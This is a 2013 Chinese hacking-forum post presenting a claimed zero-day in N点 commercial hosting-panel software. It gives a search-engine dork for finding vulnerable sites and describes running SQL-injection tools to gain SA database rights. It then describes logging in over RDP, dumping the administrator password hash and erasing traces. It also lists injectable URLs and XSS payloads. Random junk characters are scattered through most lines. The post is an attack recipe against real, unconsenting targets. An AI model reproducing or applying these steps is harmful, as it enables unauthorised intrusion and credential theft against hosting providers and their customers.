中国网络渗透测试联盟

标题: N点商业版漏洞通杀0day以及利用方法 [打印本页]

作者: admin    时间: 2013-3-3 08:06
标题: N点商业版漏洞通杀0day以及利用方法
不得不说N点实在是一个破东西
5 P9 _" M8 h) C" L  c7 b4 {就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂
$ D' x  ~% O6 n! ^& T4 l/ L好吧 抱怨一下就行了  接下来关键的时候到了) n- Y: d# x6 ~, Q( e
首先百度搜索关键字:inurl: (mmdatabase.asp)
6 b# z3 ~3 w$ B/ ]- B$ o5 [/ ^我随便列举一个:   www.xxxx.com. m* B# ~- S. q1 W4 e, T! r' d
修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1
' U9 \, `8 O& v! `9 `& K* @扔入NBSI 或者啊D等各种傻逼工具后
) [" ]8 x# R) O- O+ c你们会看到是SA权限
8 v+ X  Q& u9 w" I$ A$ L  `4 w: d果断3389 上去  hash得到administrator密码
3 G; |5 ~7 O6 f擦屁股走人~2 R! T& \7 s0 F/ w- \2 Q
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
. ?- J  o7 c- U4 S' v- ]  [ 5 k+ j. ~; p' Z: _
再附上其他几个漏洞页面# u& d8 W" i' ~- D
SQL:
+ E! i9 X- m- E% l' fhttp://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1. O! H* g$ F7 T, @
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11
: `$ `2 a7 C; }9 Rhttp://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9
  D7 t9 h8 H( P" M# |http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2+ Q. [8 O" x* j" J3 e
XSS证明:
* h9 u: E! N2 C7 Khttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
- D: p8 |% m/ Dhttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
. T5 S% G& b4 X' qhttp://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>
" R' W, z9 I/ G" f/ z由此可见点就是坑逼中的战斗机   自从用了他我的眼泪都流干了  有做IDC的朋友千万别步我后尘啊   便宜没好货好货不便宜
4 r3 |3 w$ V9 L4 }: b  D3 O还是星外吧  你们懂的9 s( |& J" F' c- m- ], o
作为一个商用程序   安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?
. u0 |. V4 E0 J" {& }PS:其实我真的很想知道你说N点这SB asp就asp吧  为什么asp还非要MSSQL  这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。   o(︶︿︶)o 唉" Z2 z' c, N  m' W
——-




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2